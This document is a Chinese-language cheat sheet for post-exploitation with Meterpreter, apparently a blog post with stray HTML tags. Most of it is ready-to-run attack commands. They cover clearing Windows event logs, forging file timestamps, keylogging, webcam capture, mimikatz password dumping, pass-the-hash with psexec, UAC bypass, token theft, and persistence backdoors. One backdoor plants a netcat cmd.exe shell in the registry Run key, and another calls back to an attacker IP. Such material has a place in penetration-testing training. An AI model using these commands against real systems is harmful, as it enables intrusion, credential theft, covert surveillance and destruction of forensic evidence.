Meterpreter 后渗透使用完全指南<\/h1>

0x00 简介<\/h2>
Meterpreter 是 Metasploit 框架中的一个高级、动态可扩展的 payload，在后渗透阶段具有强大的攻击力。它运行在内存中，通过 stager 方式建立连接，提供了一套丰富的命令集用于系统操作、信息收集、权限提升等后渗透任务。<\/p>

0x01 系统命令<\/h2>

基本系统命令<\/h3>
sessions<\/code>：查看会话

sessions -h<\/code> 查看帮助<\/li>
sessions -i <ID值><\/code> 进入会话<\/li>
sessions -k<\/code> 杀死会话<\/li>
<\/ul>
<\/li>
background<\/code>：将当前会话放置后台<\/li>
run<\/code>：执行已有的模块，输入 run 后按两下 tab 列出已有脚本<\/li>
info<\/code>：查看已有模块信息<\/li>
getuid<\/code>：查看当前权限<\/li>
getpid<\/code>：获取当前进程的 PID<\/li>
sysinfo<\/code>：查看目标系统信息<\/li>
ps<\/code>：查看当前活跃进程<\/li>
kill <PID值><\/code>：杀死指定进程<\/li>
idletime<\/code>：查看目标机闲置时间<\/li>
reboot<\/code>\/shutdown<\/code>：重启\/关机<\/li>
shell<\/code>：进入目标机 cmd shell<\/li>
<\/ul>
uictl 开关键盘\/鼠标<\/h3>

uictl [enable\/disable] [keyboard\/mouse\/all]<\/code>：开启或禁止键盘\/鼠标

uictl disable mouse<\/code>：禁用鼠标<\/li>
uictl disable keyboard<\/code>：禁用键盘<\/li>
<\/ul>
<\/li>
<\/ul>
webcam 摄像头命令<\/h3>

webcam_list<\/code>：查看摄像头<\/li>
webcam_snap<\/code>：通过摄像头拍照<\/li>
webcam_stream<\/code>：通过摄像头开启视频<\/li>
<\/ul>
execute 执行文件<\/h3>

execute<\/code>：在目标机中执行文件

execute -H -i -f cmd.exe<\/code>：创建新进程 cmd.exe，-H 不可见，-i 交互<\/li>
<\/ul>
<\/li>
<\/ul>
migrate 进程迁移<\/h3>

getpid<\/code>：获取当前进程的 PID<\/li>
ps<\/code>：查看当前活跃进程<\/li>
migrate <pid值><\/code>：将 Meterpreter 会话移植到指定 PID 值进程中<\/li>
kill <pid值><\/code>：杀死进程<\/li>
<\/ol>
clearav 清除日志<\/h3>

clearav<\/code>：清除 Windows 中的应用程序日志、系统日志、安全日志<\/li>
<\/ul>
0x02 文件系统命令<\/h2>
基本文件系统命令<\/h3>

getwd<\/code> 或 pwd<\/code>：查看当前工作目录<\/li>
ls<\/code>：列出文件<\/li>
cd<\/code>：切换目录<\/li>
search -f *pass*<\/code>：搜索文件（-h 查看帮助）<\/li>
cat c:\\lltest\\lltestpasswd.txt<\/code>：查看文件内容<\/li>
upload \/tmp\/hack.txt C:\\lltest<\/code>：上传文件到目标机<\/li>
download c:\\lltest\\lltestpasswd.txt \/tmp\/<\/code>：下载文件到本机<\/li>
edit c:\\1.txt<\/code>：编辑或创建文件（不存在则新建）<\/li>
rm C:\\lltest\\hack.txt<\/code>：删除文件<\/li>
mkdir lltest2<\/code>：在当前目录下创建文件夹<\/li>
rmdir lltest2<\/code>：删除当前目录下文件夹<\/li>
getlwd<\/code> 或 lpwd<\/code>：查看攻击者主机当前目录<\/li>
lcd \/tmp<\/code>：切换攻击者主机目录<\/li>
<\/ul>
timestomp 伪造时间戳<\/h3>

timestomp C:\/\/ -h<\/code>：查看帮助<\/li>
timestomp -v C:\/\/2.txt<\/code>：查看时间戳<\/li>
timestomp C:\/\/2.txt -f C:\/\/1.txt<\/code>：将 1.txt 的时间戳复制给 2.txt<\/li>
<\/ul>
0x03 网络命令<\/h2>
基本网络命令<\/h3>

ipconfig<\/code>\/ifconfig<\/code>：查看网络配置<\/li>
netstat –ano<\/code>：查看网络连接<\/li>
arp<\/code>：查看 ARP 表<\/li>
getproxy<\/code>：查看代理信息<\/li>
route<\/code>：查看路由表<\/li>
<\/ul>
portfwd 端口转发<\/h3>

portfwd add -l 6666 -p 3389 -r 127.0.0.1<\/code>：将目标机的 3389 端口转发到本地 6666 端口<\/li>
<\/ul>
autoroute 添加路由<\/h3>

run autoroute –h<\/code>：查看帮助<\/li>
run autoroute -s 192.168.159.0\/24<\/code>：添加到目标环境网络<\/li>
run autoroute –p<\/code>：查看添加的路由<\/li>
<\/ol>
然后可以利用 arp_scanner、portscan 等进行扫描：<\/p>
run post\/windows\/gather\/arp_scanner RHOSTS=<\/span>192.168.159.0\/24
<\/span><\/span>run auxiliary\/scanner\/portscan\/tcp RHOSTS=<\/span>192.168.159.144 PORTS=<\/span>3389<\/span>
<\/span><\/span><\/code><\/pre>Socks4a 代理<\/h3>

autoroute 添加完路由后，利用 msf 自带的 sock4a 模块：
msf> use auxiliary\/server\/socks4a
<\/span><\/span>msf> set srvhost 127.0.0.1
<\/span><\/span>msf> set srvport 1080<\/span>
<\/span><\/span>msf> run
<\/span><\/span><\/code><\/pre><\/li>
编辑 \/etc\/proxychains.conf<\/code>，添加：
socks4 127.0.0.1 1080<\/span>
<\/span><\/span><\/code><\/pre><\/li>
使用 proxychains 通过 Socks4a 代理访问<\/li>
<\/ol>
0x04 信息收集<\/h2>
信息收集脚本位于：<\/p>

\/usr\/share\/metasploit-framework\/modules\/post\/windows\/gather\/<\/code><\/li>
\/usr\/share\/metasploit-framework\/modules\/post\/linux\/gather\/<\/code><\/li>
<\/ul>
常用信息收集脚本：<\/p>

run post\/windows\/gather\/checkvm<\/code>：检测是否虚拟机<\/li>
run post\/linux\/gather\/checkvm<\/code>：检测是否虚拟机<\/li>
run post\/windows\/gather\/forensics\/enum_drives<\/code>：查看分区<\/li>
run post\/windows\/gather\/enum_applications<\/code>：获取安装软件信息<\/li>
run post\/windows\/gather\/dumplinks<\/code>：获取最近的文件操作<\/li>
run post\/windows\/gather\/enum_ie<\/code>：获取 IE 缓存<\/li>
run post\/windows\/gather\/enum_chrome<\/code>：获取 Chrome 缓存<\/li>
run post\/windows\/gather\/enum_patches<\/code>：获取补丁信息<\/li>
run post\/windows\/gather\/enum_domain<\/code>：查找域控<\/li>
<\/ul>
0x05 提权<\/h2>
1. getsystem 提权<\/h3>

getsystem<\/code>：尝试提升到 SYSTEM 权限<\/li>
<\/ul>
工作原理：<\/p>

创建一个新的 Windows 服务，设置为 SYSTEM 运行，启动时连接到命名管道<\/li>
产生一个进程创建命名管道并等待服务连接<\/li>
Windows 服务启动，建立与命名管道的连接<\/li>
进程接收连接并调用 ImpersonateNamedPipeClient，为 SYSTEM 用户创建模拟令牌<\/li>
用 SYSTEM 模拟令牌产生 cmd.exe，获得 SYSTEM 特权进程<\/li>
<\/ol>
2. bypassuac<\/h3>
内置多个 bypassuac 脚本，原理不同但使用方法类似：<\/p>
use exploit\/windows\/local\/bypassuac
<\/span><\/span>use exploit\/windows\/local\/bypassuac_injection
<\/span><\/span>use windows\/local\/bypassuac_vbs
<\/span><\/span>use windows\/local\/ask
<\/span><\/span><\/code><\/pre>示例：<\/p>
msf> use exploit\/windows\/local\/bypassuac
<\/span><\/span>msf> set SESSION 2<\/span>
<\/span><\/span>msf> run
<\/span><\/span><\/code><\/pre>运行后返回新会话，需再次执行 getsystem<\/code> 获取系统权限<\/p>
3. 内核漏洞提权<\/h3>

先用 enum_patches 收集补丁信息：
meterpreter> run post\/windows\/gather\/enum_patches
<\/span><\/span><\/code><\/pre><\/li>
查找可用 exploits 进行提权：
msf> use exploit\/windows\/local\/ms13_053_schlamperei
<\/span><\/span>msf> set SESSION 2<\/span>
<\/span><\/span>msf> exploit
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x06 mimikatz 抓取密码<\/h2>

load mimikatz<\/code>：加载 mimikatz（help mimikatz<\/code> 查看帮助）<\/li>
wdigest<\/code>：获取 Wdigest 密码<\/li>
mimikatz_command -f samdump::hashes<\/code>：执行 mimikatz 原始命令<\/li>
mimikatz_command -f sekurlsa::searchPasswords<\/code>：搜索密码<\/li>
<\/ul>
0x07 远程桌面&截屏<\/h2>

enumdesktops<\/code>：查看可用桌面<\/li>
getdesktop<\/code>：获取当前关联的桌面<\/li>
set_desktop<\/code>：设置关联的桌面（-h 查看帮助）<\/li>
screenshot<\/code>：截屏<\/li>
use espia<\/code>：使用 espia 模块截屏（输入 screengrab<\/code>）<\/li>
run vnc<\/code>：使用 VNC 远程桌面连接<\/li>
<\/ul>
0x08 开启 RDP & 添加用户<\/h2>
1. getgui 命令<\/h3>

run getgui –h<\/code>：查看帮助<\/li>
run getgui -e<\/code>：开启远程桌面<\/li>
run getgui -u lltest2 -p 123456<\/code>：添加用户<\/li>
run getgui -f 6661 –e<\/code>：3389 端口转发到 6661<\/li>
<\/ul>
注意：getgui 添加用户有时可能没有远程桌面登录权限<\/p>
2. enable_rdp 脚本<\/h3>

run post\/windows\/manage\/enable_rdp<\/code>：开启远程桌面<\/li>
run post\/windows\/manage\/enable_rdp USERNAME=www2 PASSWORD=123456<\/code>：添加用户<\/li>
run post\/windows\/manage\/enable_rdp FORWARD=true LPORT=6662<\/code>：将 3389 端口转发到 6662<\/li>
<\/ul>
实现原理：<\/p>

开启 RDP：通过 reg 修改注册表<\/li>
添加用户：调用 cmd.exe 通过 net user 添加<\/li>
端口转发：利用 portfwd 命令<\/li>
<\/ul>
0x09 键盘记录<\/h2>

keyscan_start<\/code>：开始键盘记录<\/li>
keyscan_dump<\/code>：导出记录数据<\/li>
keyscan_stop<\/code>：结束键盘记录<\/li>
<\/ol>
0x10 sniffer 抓包<\/h2>

use sniffer<\/code><\/li>
sniffer_interfaces<\/code>：查看网卡<\/li>
sniffer_start 2<\/code>：选择网卡开始抓包<\/li>
sniffer_stats 2<\/code>：查看状态<\/li>
sniffer_dump 2 \/tmp\/lltest.pcap<\/code>：导出 pcap 数据包<\/li>
sniffer_stop 2<\/code>：停止抓包<\/li>
<\/ol>
0x11 注册表操作<\/h2>
基本命令<\/h3>

reg –h<\/code>：查看帮助

-d<\/code>：注册表中值的数据<\/li>
-k<\/code>：注册表键路径<\/li>
-v<\/code>：注册表键名称<\/li>
<\/ul>
<\/li>
enumkey<\/code>：枚举可获得的键<\/li>
setval<\/code>：设置键值<\/li>
queryval<\/code>：查询键值数据<\/li>
<\/ul>
注册表设置 nc 后门<\/h3>

upload \/usr\/share\/windows-binaries\/nc.exe C:\\windows\\system32<\/code>：上传 nc<\/li>
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run<\/code>：枚举 run 下的 key<\/li>
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'<\/code>：设置键值<\/li>
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc<\/code>：查看键值<\/li>
nc -v 192.168.159.144 443<\/code>：攻击者连接 nc 后门<\/li>
<\/ol>
0x12 令牌操纵<\/h2>
1. incognito 假冒令牌<\/h3>

use incognito<\/code>：加载模块（help incognito<\/code> 查看帮助）<\/li>
list_tokens -u<\/code>：查看可用 token<\/li>
impersonate_token 'NT AUTHORITY\SYSTEM'<\/code>：假冒 SYSTEM token

或 impersonate_token NT\ AUTHORITY\\SYSTEM<\/code>（不加单引号需使用\）<\/li>
<\/ul>
<\/li>
execute -f cmd.exe -i –t<\/code>：使用假冒的 token 执行（-t 参数）

或直接 shell<\/code><\/li>
<\/ul>
<\/li>
rev2self<\/code>：返回原始 token<\/li>
<\/ul>
2. steal_token 窃取令牌<\/h3>

steal_token <pid值><\/code>：从指定进程中窃取 token（先 ps<\/code> 查看进程）<\/li>
drop_token<\/code>：删除窃取的 token<\/li>
<\/ul>
0x13 哈希利用<\/h2>
1. 获取哈希<\/h3>

run post\/windows\/gather\/smart_hashdump<\/code>：从 SAM 导出密码哈希（需要 SYSTEM 权限）<\/li>
<\/ul>
2. PSExec 哈希传递<\/h3>
通过 smart_hashdump 获取用户哈希后，利用 psexec 模块进行哈希传递攻击<\/p>
前提条件：<\/p>

目标开启 445 端口 SMB 服务<\/li>
开启 admin$ 共享<\/li>
<\/ol>
示例：<\/p>
msf> use exploit\/windows\/smb\/psexec
<\/span><\/span>msf> set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>msf> set LHOST 192.168.159.134
<\/span><\/span>msf> set LPORT 443<\/span>
<\/span><\/span>msf> set RHOST 192.168.159.144
<\/span><\/span>msf> set SMBUser Administrator
<\/span><\/span>msf> set SMBPass aad3b4*****04ee:5b5f00*****c424c
<\/span><\/span>msf> set SMBDomain WORKGROUP  # 域用户需要设置 SMBDomain<\/span>
<\/span><\/span>msf> exploit
<\/span><\/span><\/code><\/pre>0x14 后门植入<\/h2>
Metasploit 自带两种后门启动方式：<\/p>

通过启动项启动（persistence）<\/li>
通过服务启动（metsvc）<\/li>
还可通过 persistence_exe 自定义后门文件<\/li>
<\/ol>
1. persistence 启动项后门<\/h3>
在 C:\Users***\AppData\Local\Temp\<\/code> 上传 vbs 脚本，在注册表 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<\/code> 加入开机启动项<\/p>

run persistence –h<\/code>：查看帮助<\/li>
run persistence -X -i 5 -p 6661 -r 192.168.159.134<\/code>：

-X<\/code>：开机自启动<\/li>
-i<\/code>：反向连接间隔（5秒）<\/li>
-r<\/code>：攻击者 IP<\/li>
<\/ul>
<\/li>
<\/ul>
连接后门：<\/p>
msf> use exploit\/multi\/handler
<\/span><\/span>msf> set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>msf> set LHOST 192.168.159.134
<\/span><\/span>msf> set LPORT 6661<\/span>
<\/span><\/span>msf> exploit
<\/span><\/span><\/code><\/pre>2. metsvc 服务后门<\/h3>
在 C:\Users***\AppData\Local\Temp\<\/code> 上传三个文件（metsrv.x86.dll、metsvc-server.exe、metsvc.exe），通过服务启动，服务名为 meterpreter<\/p>

run metsvc –h<\/code>：查看帮助<\/li>
run metsvc –A<\/code>：自动安装后门<\/li>
<\/ul>
连接后门：<\/p>
msf> use exploit\/multi\/handler
<\/span><\/span>msf> set payload windows\/metsvc_bind_tcp
<\/span><\/span>msf> set RHOST 192.168.159.144
<\/span><\/span>msf> set LPORT 31337<\/span>
<\/span><\/span>msf> exploit
<\/span><\/span><\/code><\/pre>0x15 扫描脚本<\/h2>
扫描脚本位于：

\/usr\/share\/metasploit-framework\/modules\/auxiliary\/scanner\/<\/code><\/p>
常用扫描脚本示例：<\/p>
use auxiliary\/scanner\/http\/dir_scanner
<\/span><\/span>use auxiliary\/scanner\/http\/jboss_vulnscan
<\/span><\/span>use auxiliary\/scanner\/mssql\/mssql_login
<\/span><\/span>use auxiliary\/scanner\/mysql\/mysql_version
<\/span><\/span>use auxiliary\/scanner\/oracle\/oracle_login
<\/span><\/span><\/code><\/pre>参考资源<\/h2>

Null Byte - Meterpreter Command Cheat Sheet<\/a><\/li>
Offensive Security - Fun with Incognito<\/a><\/li>
Offensive Security - Persistent Netcat Backdoor<\/a><\/li>
Offensive Security - Privilege Escalation<\/a><\/li>
Hacking Articles - 7 Ways to Privilege Escalation<\/a><\/li>
Offensive Security - PSExec Pass the Hash<\/a><\/li>
<\/ul>